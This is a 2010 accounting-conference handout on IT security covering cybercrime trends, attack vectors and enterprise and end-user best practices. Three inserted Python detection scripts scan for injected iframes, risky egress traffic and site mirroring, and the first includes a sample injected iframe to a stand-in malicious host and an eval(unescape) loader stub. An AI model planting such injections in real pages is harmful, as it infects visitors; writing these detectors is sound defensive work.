IT Security
CalCPA 2010 Wine Industry Conference

Compiled by Maureen Stubblefield
Contents

Threat Landscape ... 3
    Insiders: well-meaning and malicious ... 3
    Cybercriminals ... 3
    Governments / Terrorists ... 5
Targets / Application Spaces / Control Points ... 6
    Web Browsers & Plugins ... 6
    Websites ... 6
    Social Networks ... 6
    Cloud Computing Environments ... 7
    Internal Networks ... 8
    Endpoints ... 8
Security Threat Mitigation ... 9
    Defense Challenge ... 9
    Enterprise Security Best Practices ... 9
    End-User Security Best Practices ... 10
    Toolset ... 10
Regulations & Audit Frameworks ... 12
    Audit Frameworks ... 12
    State & Federal Security Legislation ... 13
References ... 14
    Tools & Resources ... 14
    Articles ... 14




Compiled by Maureen Stubblefield – Occidental Technical Group, LLC 2010
Page 2 of 15
Threat Landscape

Insiders: well-meaning and malicious
• Employees who unintentionally violate data security policies play a major role in data breaches. This is due in part to the increasing amount of data that winds up on unprotected endpoints and servers. Symantec reports that the number one cause of audit failure within organizations is the lack of employee awareness of security policies and/or a lack of enforceable policies relating to data security. A recent example of an unintended data breach was the transmission of personal information affecting 4,000 employees of the General Services Administration. The federal agency reported that an employee accidentally emailed a sensitive file while seeking “work-related” assistance. The breach was discovered weeks later by routine review of email logs.
• The Ponemon Institute reported in a 2009 survey of companies that experienced data breaches that 88% resulted from negligence. Examples included leaving unencrypted USB drives with sensitive data in public spaces; sending sensitive data using public email accounts such as Gmail; emailing sensitive data to unintended recipients; and loss of endpoint devices such as smartphones, laptops, and USB drives. Symantec Research supports these findings, reporting that the most common type of data breach occurs when confidential data has been stored, sent, or copied in an unencrypted form by insiders, and then captured in some fashion by hackers.
• Malicious insiders account for an increasing number of data breaches, due in part to the escalation in recession-related layoffs. A joint survey conducted in 2009 by Symantec and the Ponemon Institute of employees who left or lost a job found that 59% admitted to stealing confidential company information. Verizon reported in its 2010 Data Breach Investigations Report that 48% of the 257 data breaches studied were conducted by insiders, with 90% being deliberate and malicious and involving the misuse of privilege. The report concludes that many employees are over-privileged and under-monitored. Wikileaks' recent exposure of 400,000 classified military logs pertaining to the Iraq war is an example of a relatively low-tech operation carried out by an insider – a disenchanted, low-level Army intelligence analyst who for an extended period of time was able to exploit a security loophole. Most recently, the New York Times published excerpts from some 250,000 individual cables, the daily traffic between the State Department and more than 270 American diplomatic outposts around the world. Wikileaks allegedly obtained the documents from the same individual who obtained the previous documents.
• A 2009 report by the Open Security Foundation disclosed an unexpected discrepancy between potential and realized cases of identity theft. Though the study focused on identity theft, the findings support the fact that the insecure use and storage of data significantly increases the potential for serious data breaches. They found that physical theft or loss accounted for 37% of data breaches that could have resulted in identity theft, but for only 4% of identities actually exposed. During the same time period, electronic hacking accounted for only 15% of potential identity theft breaches, but 60% of actual identities exposed. Insecure data access policies accounted for 26% of potential breaches, and 35% of actual identities exposed.

Cybercriminals
• Cybercriminals dominate the threat landscape, and are rapidly building increasingly sophisticated networks for developing and distributing advanced vulnerability detection, intrusion, and data capture tools and technologies. These networks are composed of thousands of loosely affiliated specialists around the globe. They remain elusive, decentralized, and self-healing, rendering them nearly impossible to track and eradicate.
• One of the largest computer crime incidents ever reported was orchestrated in 2008 by Albert Gonzalez from the U.S. and two Russian co-conspirators. Using a widely decentralized, multi-national cybercriminal network, they organized a highly sophisticated attack that broke into several major financial institutions, stealing data from more than 130 million credit and debit card accounts. Heartland Payment Systems, a company that processes credit card payments for thousands of stores and businesses around the country, was a key target in this attack.
• The U.S. continues to lead in originating malicious cyber attacks and also leads as the target of such attacks. There has, however, been a significant shift in malicious activity towards emerging countries as their Internet infrastructure and broadband usage grows. For example, Brazil was ranked third in cybercrime activity in 2009, the first year that a country other than the U.S., China, or Germany ranked in the top three.
• Attack profiles often cross national borders: an attack is launched from one country against an entity in a second country, channeling breached data to yet a third country. This decentralization of attack components compounds the difficulty of tracking and eradicating the perpetrators. For example, the Russian Business Network (RBN), a well-funded underground professional organization, excels in the international distribution of malicious code, malicious website hosting, and other malicious activity. RBN increasingly leverages the growing infrastructure of emerging countries such as Brazil, and has been credited with creating about half of the total phishing incidents that have occurred worldwide.
• The primary motivations of cybercriminals are financial gain, intelligence and intellectual property theft, and process disruption. The FBI reported that in 2009, cybercrime increased 23%, while financial losses from attacks more than doubled, demonstrating the growing efficacy and sophistication of these cybercriminal networks. These statistics under-report the magnitude of the problem, as a significant number of attacks go undocumented.
• Symantec reported that 75% of enterprises surveyed experienced some form of cyber attack in 2009, while Kaspersky Labs reported 30,000 new threats discovered every day. CNET reported in October 2009 that 63% of midsized organizations saw an increase in cyber threats and that 71% think a serious breach could put them out of business. Symantec reports that during the first quarter of 2010, there were over 327 million attempts made to infect computers globally, a 26.8% increase over the previous quarter. During the same period, more than 119 million malware-hosting servers were detected.
• A major factor driving the rapid rise in cybercrime is the growing potential for low-risk financial gain. Individual exposure is reduced and barriers to entry lowered with simple “one click” access to low-cost, highly specialized, automated and customizable crime attack toolkits. A thriving underground marketplace provides access to these tools and services, offering pre-deployed botnets, vulnerability seekers, website attack kits, and frame coders, to name a few. Several crimekits have gained in popularity, spawning competition and new business models among their developers. They are competing on the ground level for market share, employing tactics such as intercepting communications of competing crimekits when detected on the same hacked system. Crimekits such as Zeus and SpyEye are readily available for about $700 on the underground economy, with many others available for free on various underground forums. Botnet-infected computers are advertised in the underground economy for as little as 3 cents per computer, providing the base infrastructure for wide-scale attacks. Sophisticated utilities automate changes in the crimekits, resulting in polymorphic threats that render traditional antivirus detection technologies all but useless. In 2009, Symantec observed nearly 90,000 unique variants of the basic Zeus toolkit, and created 2.8 million new malicious code signatures, a 71% increase over 2008 due to a continuous release of new variants. On one particular day in 2009, Kaspersky created 13,500 signatures. These statistics make it clear that signature-only detection is no longer effective. Heuristic, behavioral, and reputation-based techniques need to be added to the anti-malware arsenal.
• In addition to tools and services, the underground marketplace provides access to FTP credentials for thousands of legitimate websites, credit card numbers, bank accounts, and more. One popular tool for website exploits helps attackers manage FTP credentials, tests the credentials, sniffs sites for specific vulnerabilities and automates web page alteration.
• Search engine poisoning is commonly used by cybercriminals to elevate malicious sites, including those appearing to provide “free” security software such as Spyware Guard, Spyware Secure and XP Antivirus, to the top of the result list, increasing their appearance of legitimacy.

Governments / Terrorists
• Cybercrime is emerging as one of this country’s most publicized national security concerns, with 12-14 billion dollars being spent annually by the National Security Agency. According to the Symantec 2010 State of Enterprise Security Report, cybercrime now outranks traditional crime, natural disasters and terrorism as the top risk to large organizations and governments. While the “enemy” remains elusive and dispersed, the threat is real. An increasing number of countries and nation states are directing a significant amount of resources to cyber-security, including China, Russia, Germany and Israel, to name a few. Steven Chabinsky, a senior FBI official responsible for cyber-security, reported that “given enough time, motivation and funding, a determined adversary will always, always, be able to penetrate a targeted system.”
• While security experts may disagree on the prioritization of specific attack venues by cybercriminals, they are in agreement as to the growing potential to compromise mission-critical infrastructures and to infiltrate sensitive communication channels. Experts classify attacks as cyber-war when networks are penetrated for the purpose of disrupting or dismantling them to the point of making them inoperable, and as cyber-espionage when electronic communications are captured for the purpose of gathering national security or commercial intelligence.
• The Stuxnet worm, designed to specifically target specialized Siemens instrumentation, is a clear case of a cyber-war attack. It is believed to have found its way into Iran’s “closed” critical national infrastructure via a contractor’s removable drive, since the target network had no connections to the Internet. It is believed that the worm was developed under the direction of a government or nation state, with the U.S. and/or Israel as possible initiators.
• There has been a recent upsurge in the sophistication of malicious computer activity associated with China. For example, The National Defense Magazine reported in November 2010 that a state-funded telecommunications company, China Telecom, re-routed Internet traffic to and from websites of the U.S. Senate, the Department of Defense, and "many others" including NASA, for 18 minutes on April 8. It is estimated that 15% or more of all Internet traffic was re-routed during this time, making it the largest hijack ever witnessed and stunning security experts worldwide. The amount of potential data breached is unknown, but could be huge. Dmitri Alperovitch, Vice President of Threat Research at McAfee, suggests that the Chinese may have carried out eavesdropping on unprotected communications including emails and instant messaging, manipulated data, and/or decrypted data. The technique used to perform the re-route has never before been executed on such a large scale, and is now a part of the toolset of cybercriminals worldwide. The New York Times recently reported that China’s Politburo directed the intrusion into Google’s computer systems in that country. The Google hacking was part of a coordinated campaign of computer sabotage carried out by government operatives, private security experts, and Internet outlaws recruited by the Chinese government. The recent release of cables by Wikileaks reports that Chinese operatives have infiltrated computers of the American government, Western allies, and American businesses since 2002.
• To date, no cyber attacks have been linked directly to terrorist groups, though it seems inevitable that cybercrime will become a key component in the arsenal of these organizations, given the potential for massive systems disruption with increasingly lower barriers to entry.

Targets / Application Spaces / Control Points

Web Browsers & Plugins
• Symantec reports that the top Web-based attacks observed in 2009 primarily targeted vulnerabilities in Internet Explorer and applications that process PDF files.
• ActiveX technologies constituted the majority of new browser plug-in vulnerabilities, followed closely by Adobe Reader, Flash, QuickTime and Java extensions and plug-ins.
• The following table demonstrates that browser market share influences attack frequency far more than the number of detected vulnerabilities. Firefox is reported to have the highest number of vulnerabilities and the largest exposure window (days between vulnerability detection and patch availability), yet Internet Explorer and Chrome are the most commonly exploited.

    Browser              Vulnerabilities    Exposure (days)
    Firefox                    169                 13
    Safari                      94                  1
    Internet Explorer           45                  1
    Chrome                      41                  1

Websites
• Websites continue to be a favored attack vector as the number of new sites and supporting technologies grows along with the exponential rise in Internet surfing. Web-based attacks have replaced mass-mailing worms as primary entry points for malicious activity.
• 77% of websites that contain malicious content are completely legitimate sites that have been compromised by cybercriminals. Small businesses, state and local governments, and educational institutions are specifically being targeted as they are often behind in security spending and protection.
• The most straightforward method used to compromise websites is through administrative access with valid credentials. Attackers often capture FTP credentials using malware installed on the Web developer’s computer. In 2009, security researchers at VeriSign discovered a Command & Control server that contained credentials for 88,000 FTP servers.
• Compromised websites can perform a host of malicious actions, including downloading malicious code onto visitors’ computers, gaining personal information through seemingly valid web forms, and masquerading as legitimate sites to obtain user information such as credit card numbers, banking credentials, etc.
• SQL Injection is a technique used to infect Web servers with code that redirects users to sites containing malicious content and downloads. For example, in 2009 an attacker automated the infection of more than 125,000 websites with a single iFrame that installed a downloader Trojan from a Chinese server.
• Attackers leverage website vulnerabilities to plant obfuscated JavaScript that is specifically tailored to download malware as users hit the site. Known as a “drive-by download”, users are infected simply by visiting legitimate sites that have been compromised.
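To show the site owner's side of the injected-iframe and obfuscated-JavaScript patterns described above, here is an added example (not from the original document or any vendor it cites) that scans a page's HTML for zero-size or hidden off-site iframes and for inline scripts built from eval/unescape calls or long escape runs. The sample page, the host name www.winery.example and the detection thresholds are constructed for the example.

```python
"""Scan a page's HTML for injected hidden iframes and obfuscated inline
JavaScript. Added example, not from the original document; stdlib only."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Obfuscation heuristics: calls typical of packed loaders, and long runs of
# %XX or \xXX escapes. Thresholds are assumptions; tune them per site.
OBFUSCATION_CALLS = re.compile(r"\b(?:eval|unescape|String\.fromCharCode|document\.write)\s*\(")
ESCAPE_RUN = re.compile(r"(?:\\x[0-9a-fA-F]{2}|%[0-9a-fA-F]{2}){12,}")
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


class InjectionScanner(HTMLParser):
    """Collects (finding_type, evidence) pairs while parsing one page."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []
        self._in_script = False
        self._script_parts = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            src = (a.get("src") or "").strip()
            host = (urlparse(src).hostname or "").lower()  # "" for a relative src
            zero_size = self._is_zero(a.get("width")) and self._is_zero(a.get("height"))
            hidden = zero_size or bool(HIDDEN_STYLE.search(a.get("style") or ""))
            # A frame the visitor cannot see that loads content from another
            # host is the classic drive-by download injection.
            if hidden and host and host != self.site_host:
                self.findings.append(("hidden_offsite_iframe", src))
        elif tag == "script":
            self._in_script = True
            self._script_parts = []

    def handle_data(self, data):
        if self._in_script:
            self._script_parts.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._script_parts)
            calls = len(OBFUSCATION_CALLS.findall(body))
            if calls >= 2 or ESCAPE_RUN.search(body):
                self.findings.append(("obfuscated_inline_script", body[:60]))

    @staticmethod
    def _is_zero(value):
        if value is None:
            return False
        try:
            return float(value.strip().rstrip("px")) == 0
        except ValueError:
            return False


def scan_page(html, site_host):
    """Return the list of findings for one page served from site_host."""
    scanner = InjectionScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a legitimate page with a legitimate embedded map, plus an
# attacker-appended zero-size off-site iframe and an eval(unescape(...)) loader.
SAMPLE_PAGE = """<html><body>
<h1>Winery Newsletter</h1>
<iframe src="/embed/map" width="400" height="300"></iframe>
<script>var year = new Date().getFullYear();</script>
<iframe src="http://malicious.example/in.php" width="0" height="0" style="display:none"></iframe>
<script>eval(unescape('%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%29'));</script>
</body></html>"""

if __name__ == "__main__":
    for kind, evidence in scan_page(SAMPLE_PAGE, "www.winery.example"):
        print(f"{kind}: {evidence}")
```

Run it against a crawl of your own site's pages; a finding is a cue to compare the page with the version in source control and to rotate the FTP or admin credentials used to publish it.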

Social Networks
• Social networking communities are an intrinsic part of today’s Internet, with companies leveraging social media to target an increasingly eclectic customer base. In July, Facebook announced they have over 500 million users. These growing networks have become a fertile ground for cybercriminals.
• Symantec’s 2010 report “The Risks of Social Networking” provides a detailed assessment of cybercrime in the social network realm. The supporting platforms are constantly evolving and becoming more complex, and vulnerabilities in their frameworks continue to be discovered and exploited. User privacy can be breached by gaps in the underlying framework, by embedded applications that have leaked information, and by skillfully designed social engineering.
• Most social network sites allow for automated access with scripts that attackers can use to crawl the network, collect email addresses, real names, and even context data such as hobbies, enabling clever social engineering attacks to be constructed. Many sites allow third-party applications such as Farmville to access user data through multiple application interfaces. In addition to legitimate functions, these applications are capable of introducing weaknesses into a user’s profile, which can lead to serious data breaches. For example, there are numerous reports of application vulnerabilities that allow permissions granted to a legitimate application to be shared by a malicious application. As a result, any installed application can constitute an indirect security risk.
• Twitter was compromised with phishing tweets containing URLs that redirected login information. The malicious destinations were obscured by URL-shortening utilities used to include links within the 140-character limit. This was followed by a mass worm carried in the form of fake Twitter invitations, used to gather email addresses from the compromised computers and then spread by copying itself to removable drives and shared folders.
• Brand reputations of social networks are often leveraged in order to provide credibility to bulk email sent outside the social network. For example, spoofed email claiming to come from the site’s support center may notify users of password-reset requirements. These messages often contain links to malicious websites or malicious attachments.

Cloud Computing Environments
• Security concerns are one of the main reasons given by organizations for not adopting Cloud technologies. A 2010 Forrester survey of 211 North American & European Enterprise Software Decision Makers ranked security as a leading concern in avoiding the Cloud for applications supporting sensitive data. The evolution of Cloud technologies has outpaced efforts to build comprehensive industry standards relating to security. Cloud security standards are weak, and controls are often not transparent or auditable. Many cloud vendors will not provide transparency as to the controls used to secure their data centers and infrastructure, saying that doing so would increase their exploit vulnerability. Cloud customers nevertheless need to be tenacious in learning how data is secured and segregated in multi-tenant systems.
• Though an increasing number of Cloud vendors tout SAS 70 compliance, the audit standard was not intended to account for the layered controls inherent in the Cloud architecture. ISO 27002, while more applicable to some aspects of the Cloud environment, was also not designed to address the multi-vendor layered infrastructure. Gartner analyst Neil MacDonald, while acknowledging that ISO 27001 is not sufficient, sees it to be the best security specification to date for the Cloud. Microsoft’s cloud datacenters comply with ISO 27001, with Amazon soon to follow.
• Identity management, such as role-based access controls, has not matured and is complicated by the anywhere, anytime access model inherent in the Cloud. Google has attempted to address this issue with its “Secure Data Connector”, which uses a secure encrypted connection between the data and the applications. This type of solution will not scale well as companies adopt multiple cloud-based solutions with differing access controls.
• Existing laws and regulations related to security also impact cloud adoption. Data privacy laws in Europe block the movement of personal data to any place outside the EU unless the data is protected under the same laws as in the EU, which is not common. As a result, European companies are not legally able to employ Cloud services for employee or customer data. In the U.S., Federal regulations such as the Federal Information Security Management Act (FISMA) require vendors to keep sensitive data within the country. In response, Cloud vendors are building government Clouds in order to receive FISMA certification to service these federal agencies, while saying that this type of requirement is not scalable to the “Public Cloud”.
• The Cloud Security Alliance (CSA), a non-profit organization, was founded in 2008 to promote the use of “best practices” for providing security assurance within the Cloud computing environment, and promises to provide comprehensive security control guidelines targeted specifically at the complexities of Cloud architecture. CSA published “Top Threats to Cloud Computing” in March 2010. The document will be updated on a regular basis and is available on the CSA website. One of their stated goals is to provide education on the uses of Cloud computing to “help secure all other forms of computing”. Much of the information contained in CSA publications and on the website is applicable to traditional computing environments.

Internal Networks
• Significant focus has been placed on securing the local network perimeter, resulting in fewer attacks targeting this space. The core network infrastructure changes less frequently and is more easily brought under the purview of strict change control procedures and centralized security management.
• Firewalls can be configured to limit Internet-based traffic and control source access to the internal network infrastructure. Security appliances in combination with antivirus software can inspect and filter egress and ingress traffic and set alert thresholds to detect malicious activity.
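As an added example (not from the original document) of the egress filtering and alert thresholds described above, the following script reviews connection-log lines against an assumed policy: web traffic may leave only via the proxy, SMTP only from the mail relay, and any other internal host contacting more than a threshold number of external addresses is reported as a likely "zombie". The log format, the IP addresses and the thresholds are all constructed for the example.

```python
"""Review egress connection logs against a simple filtering policy.
Added example, not from the original document; stdlib only."""
import ipaddress
import re
from collections import defaultdict

# Assumed log format (constructed for this example):
#   <timestamp> ACCEPT|DROP src=<ip> dst=<ip> proto=<tcp|udp> dport=<port>
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<action>ACCEPT|DROP)\s+src=(?P<src>\S+)\s+dst=(?P<dst>\S+)"
    r"\s+proto=(?P<proto>\w+)\s+dport=(?P<dport>\d+)$"
)

# Assumed site policy (constructed values, not from the document).
POLICY = {
    "internal_net": ipaddress.ip_network("10.0.0.0/8"),
    "web_proxy": "10.0.0.5",     # the only host that may reach 80/443 directly
    "mail_relay": "10.0.0.25",   # the only host that may send SMTP outbound
    "fan_out_threshold": 3,      # distinct external peers per host before alerting
}


def parse_line(line):
    """Return the parsed fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def analyze(lines, policy=POLICY):
    """Return (alert_type, source_host, detail) tuples for policy violations.

    Only ACCEPTed internal-to-external flows are examined: DROPped lines never
    left the network, and internal-to-internal traffic is not egress.
    """
    alerts = []
    external_peers = defaultdict(set)
    exempt = {policy["web_proxy"], policy["mail_relay"]}
    for raw in lines:
        rec = parse_line(raw)
        if rec is None or rec["action"] != "ACCEPT":
            continue
        src, dst, dport = rec["src"], rec["dst"], int(rec["dport"])
        try:
            src_ip, dst_ip = ipaddress.ip_address(src), ipaddress.ip_address(dst)
        except ValueError:
            continue  # malformed address; skip rather than abort the review
        if src_ip not in policy["internal_net"] or dst_ip in policy["internal_net"]:
            continue
        if dport in (80, 443) and src != policy["web_proxy"]:
            alerts.append(("proxy_bypass", src, f"{dst}:{dport}"))
        elif dport == 25 and src != policy["mail_relay"]:
            alerts.append(("direct_smtp", src, f"{dst}:{dport}"))
        external_peers[src].add(dst)
    # Threshold alert: a workstation talking to many external hosts is a
    # classic sign of a botnet-infected machine rather than normal use.
    for src in sorted(external_peers):
        peers = external_peers[src]
        if src not in exempt and len(peers) > policy["fan_out_threshold"]:
            alerts.append(("fan_out", src, f"{len(peers)} external hosts"))
    return alerts


# Constructed sample log: one proxy flow, one relay flow, one chatty workstation.
SAMPLE_LOG = """2010-11-30T09:00:01 ACCEPT src=10.0.0.5 dst=198.51.100.10 proto=tcp dport=443
2010-11-30T09:00:02 ACCEPT src=10.0.1.17 dst=198.51.100.44 proto=tcp dport=443
2010-11-30T09:00:03 ACCEPT src=10.0.1.17 dst=203.0.113.7 proto=tcp dport=25
2010-11-30T09:00:04 DROP src=10.0.1.17 dst=203.0.113.8 proto=tcp dport=25
2010-11-30T09:00:05 ACCEPT src=10.0.1.17 dst=203.0.113.21 proto=tcp dport=8080
2010-11-30T09:00:06 ACCEPT src=10.0.1.17 dst=203.0.113.22 proto=tcp dport=6667
2010-11-30T09:00:07 ACCEPT src=10.0.2.9 dst=10.0.0.25 proto=tcp dport=25
2010-11-30T09:00:08 ACCEPT src=10.0.0.25 dst=192.0.2.30 proto=tcp dport=25
this line is not a connection record"""

if __name__ == "__main__":
    for kind, host, detail in analyze(SAMPLE_LOG.splitlines()):
        print(f"{kind:13} {host:12} {detail}")
```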

Endpoints
• As network perimeter security has become more effective in mitigating data breaches, devices such as desktops, laptops, and mobile devices have become primary entry points for malicious activity. They are ubiquitous and have underlying technologies that continually change, making them one of the top security challenges.
• Kaspersky reports that 88% of Fortune 500 companies have compromised PCs running Trojans in their environments, moving terabytes of corporate data to stealthy drop zones scattered about the cybercrime infrastructure. Deep access at the root level on an endpoint device can provide an attacker with access to any system the user can access, including data as well as credentials and access to other organizational applications. Trojans can record all Internet-related traffic, perform keystroke logging, and intercept emails, browser-stored passwords, and a long list of additional items. In addition, the endpoint device can be transformed into a “zombie” machine as part of a larger botnet, using it to spread malware to other systems within and outside of an organization.
• Applications downloaded by users, including WinZip, RealPlayer, QuickTime, Adobe PDF and browser plug-ins, are becoming favored entry points. They are typically undocumented, full of vulnerabilities, and seldom patched or updated. IT departments rarely know what applications are running in their environments, never mind their versions and patch levels.
• Endpoint devices do not even need Internet access to be vulnerable. A 2009 data breach of highly classified information at the Pentagon targeted servers that were never directly connected to the Internet. Hackers gained access to computers belonging to third-party contractors hired to work on a fighter jet. This attack demonstrates the type of sophisticated reconnaissance in which cybercriminals often engage.
• Smartphones are ripe endpoint targets for hackers as they adapt their tested methods for infecting computers to attack Internet-enabled mobile phones. The largest reported smartphone breach occurred on Android phones, whereby certain wallpaper apps opened phones to hackers who harvested phone numbers and other stored data and transmitted it to websites in China. The number of attacks targeting smartphones is expected to grow exponentially, and as enterprise organizations such as the financial services and healthcare industries continue to adopt phone-based applications, the risk of exposure will continue to increase. Smartphone security vendors include ESET, F-Secure Mobile, Kaspersky, and Trend Micro, whose products include features such as mobile virus and firewall protection, and the ability to lock or wipe a stolen phone.

Security Threat Mitigation

Defense Challenge
• Malware is in a state of rapid evolution, as evidenced by Symantec’s 2009 report showing a 71 percent increase in the generation of malicious code signatures over 2008. In addition, more than 240 million new malicious programs were identified, a 100 percent increase over 2008.
• With anti-malware vendors producing up to 20,000 new malicious code signatures each day to keep pace with the exponential growth, false positive detections are becoming more prevalent, resulting in widespread system crashes.
• The current model of malware detection is like a war in which the attacker fires first, and only after significant damage is incurred can action be taken to guard against a similar attack. Vendors agree that the reactionary, signature-based model is flawed and cumbersome to implement and maintain. Heuristic, behavioral, and reputation-based detection schemes are increasingly being incorporated in security suites. System performance degradation is often an unfortunate by-product of beefed-up security.
• A recently discovered category of malware, coined AET (Advanced Evasion Techniques), is designed to slip past most intrusion prevention systems and deliver exploits to targeted machines without leaving a trace. Computer Emergency Response Teams (CERTs) in several countries have recently notified dozens of IPS vendors so they can build in protection. An AET attack aggregates known exploits that an IPS would typically detect individually, but in combination they slip past best-of-breed IPSs.

Enterprise Security Best Practices
• Appoint a security administrator with the authority and responsibility to oversee and enforce enterprise-wide security.
• Limit the exposure surface by disabling and/or removing unnecessary services on servers and in application spaces such as IIS and SQL.
• Explicitly budget for a “defense in depth” security model that incorporates multiple mutually supportive defensive systems to guard against single-point failures in any specific technology or protection method.
    o Leverage appliance-based security devices that include automatic updates, such as Internet traffic filters, vulnerability scanners, mail filters, and intrusion detection/protection systems.
    o Perform ingress and egress filtering on all network traffic to scan for malicious activity and unauthorized communications.
    o Implement Network Access Protection (NAP) to control access to network resources based on the security profile of the attaching device and on granularly configured client profiles and access policies. Configure NAP to clean infected clients prior to rejoining the network. Isolate infected systems quickly to prevent the risk of further infection within the enterprise. Determine how the system became infected and patch the vulnerability on all systems.
    o Automate security enforcement where possible.
    o Centralize security patch and antivirus management for all servers and endpoint devices. Gartner Research reports that as many as 85% of network attacks that successfully penetrate network defenses are made through vulnerabilities for which patches have been released.
    o Increase focus on securing endpoint devices. Ensure that network security policies and protection software are applied to and updated on all devices regardless of location.
    o Secure the corporate website. Acunetix, a security vendor, found that 70% of 3,200 scanned corporate and non-commercial organization websites contained serious vulnerabilities. Implement web-server log monitoring to track if and when complete downloads of company websites, logos, and/or images are occurring. This may indicate an attempt to duplicate the legitimate website to create an illegitimate site for phishing.
    o Limit application and web browser installation and plug-ins to system administrators via policy.
    o Enforce password policies with complexity requirements and require that passwords be changed on a regular basis. Passwords should not contain dictionary words.
    o Implement multifactor authentication for access to sensitive data, including data stored on endpoint devices such as laptops.
• Implement the least privilege rule for all critical data and systems. Restrict user permissions to the absolute minimum necessary for users to perform their work, and review access permissions on a regular basis.
• Conduct regular employee security training, and create a network use policy to be signed by employees.
• Institute change control procedures to bring new data flows under the security umbrella. Follow a data lifecycle plan that includes the secure archival and/or destruction of legacy data.
• Conduct regular audits of the corporate network. Implement third-party compliance audits, such as PCI DSS, as well as internal audits of data access, user permissions, and account additions and/or changes.
• Ensure disaster recovery procedures are in place, including a backup-and-restore solution with adequate retention in order to restore lost or compromised data in the event of a successful attack or catastrophic data loss.
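
One way to implement the web-server log monitoring recommended above, as an added example that is not part of the original document: it flags any client that successfully fetches most of the site's own assets within a short window, which is what a site-cloning tool does and an ordinary visitor does not. The combined log format is the standard Apache/nginx one; the asset list, IP addresses, user agents and log lines are all constructed.

```python
# Added example (not from the original document): flag clients that fetch an
# unusually large share of a site's own assets in a short window, which the
# text above treats as a possible precursor to a cloned phishing site.
# All log lines and addresses below are constructed for illustration.
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Apache/nginx "combined" log format; fields we do not need are skipped.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

def parse_line(line):
    """One combined-format line -> dict, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group('ts'), '%d/%b/%Y:%H:%M:%S %z')
    return {'ip': m.group('ip'), 'ts': ts, 'path': m.group('path'),
            'status': int(m.group('status')), 'ua': m.group('ua')}

def find_mirroring_clients(lines, site_assets, window=timedelta(minutes=5),
                           threshold=0.8):
    """Return {ip: {'coverage', 'user_agents'}} for clients that fetched at
    least `threshold` of `site_assets` (HTTP 200) inside any `window` span."""
    assets = set(site_assets)
    per_ip = defaultdict(list)            # ip -> [(ts, path, ua), ...]
    for line in lines:
        rec = parse_line(line)
        if rec and rec['status'] == 200 and rec['path'] in assets:
            per_ip[rec['ip']].append((rec['ts'], rec['path'], rec['ua']))
    flagged = {}
    for ip, fetches in per_ip.items():
        fetches.sort()                    # chronological order
        in_window = Counter()             # distinct asset paths in the window
        lo, best = 0, 0.0
        for ts, path, _ua in fetches:
            in_window[path] += 1
            while ts - fetches[lo][0] > window:   # slide window start forward
                old = fetches[lo][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                lo += 1
            best = max(best, len(in_window) / len(assets))
        if best >= threshold:
            flagged[ip] = {'coverage': round(best, 2),
                           'user_agents': sorted({f[2] for f in fetches})}
    return flagged

# Constructed sample: the public site's assets, then a normal visitor, a slow
# crawler (one asset every ten minutes) and a bulk mirror run by a CLI tool.
SITE_ASSETS = ['/index.html', '/about.html', '/css/site.css',
               '/js/app.js', '/img/logo.png', '/img/hero.jpg']

def _line(ip, ts, path, ua):
    return f'{ip} - - [{ts}] "GET {path} HTTP/1.1" 200 1024 "-" "{ua}"'

SAMPLE_LOG = [
    _line('198.51.100.7', '10/Nov/2010:09:00:01 -0800', '/index.html', 'Mozilla/5.0'),
    _line('198.51.100.7', '10/Nov/2010:09:00:02 -0800', '/css/site.css', 'Mozilla/5.0'),
    _line('198.51.100.7', '10/Nov/2010:09:00:02 -0800', '/img/logo.png', 'Mozilla/5.0'),
] + [_line('192.0.2.9', f'10/Nov/2010:10:{10 * i:02d}:00 -0800', a, 'Mozilla/5.0')
     for i, a in enumerate(SITE_ASSETS)
] + [_line('203.0.113.5', f'10/Nov/2010:13:55:{30 + 5 * i:02d} -0800', a, 'Wget/1.12')
     for i, a in enumerate(SITE_ASSETS)]
```

On the sample, only the client that pulled every asset within thirty seconds is reported; the slow crawler touches the same six assets but never more than one per five-minute window, so the window length is what separates mirroring from ordinary browsing.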

End-User Security Best Practices

• Avoid following links from email, as they can redirect to spoofed or malicious websites. Instead, manually type the URL to ensure you are connecting to the legitimate original site.
• Never view, open, or execute email attachments unless the attachment is expected and comes from a known and trusted source. Be suspicious of any emails that are not directly addressed to you.
• Be cautious of pop-up windows and banner advertisements that mimic legitimate displays. Suspicious error messages displayed inside the web browser are a common method used by rogue security software scams to lure users into downloading and installing malicious code.
• Never disclose confidential personal or financial information unless and until you can confirm that the request for information is legitimate.
• Do not conduct high-risk activities such as online banking from public computers.
• Encrypt sensitive data on endpoint devices such as USB keys, backup devices, laptops, smartphones, etc.
• Secure critical data while in transit over public networks, including email, instant messaging, and file transfers.

Toolset
• Firewalls are a basic line of defense for restricting specific types of traffic and limiting other types to only certain source addresses. Ensure that your firewall only allows traffic that is essential for business.
• Web Content Filters analyze egress and ingress network traffic, filtering out malicious communications. They can be appliance, cloud, or software based. Barracuda is a leading appliance vendor and OpenDNS is a leading cloud-based vendor. Both solutions provide regular content updates.
• Vulnerability Scanners seek out known weaknesses, using databases that are constantly updated by vendors, to track down devices and systems on the network that are open to attack. They detect unsafe code, misconfigured systems, malware, and patches and updates that should be applied. They are also valuable in detecting systems that are not authorized to be on the network.
• Intrusion Detection & Protection Systems are devices or software applications that monitor network and/or system events for malicious activities or policy violations. (Securitytools.org)
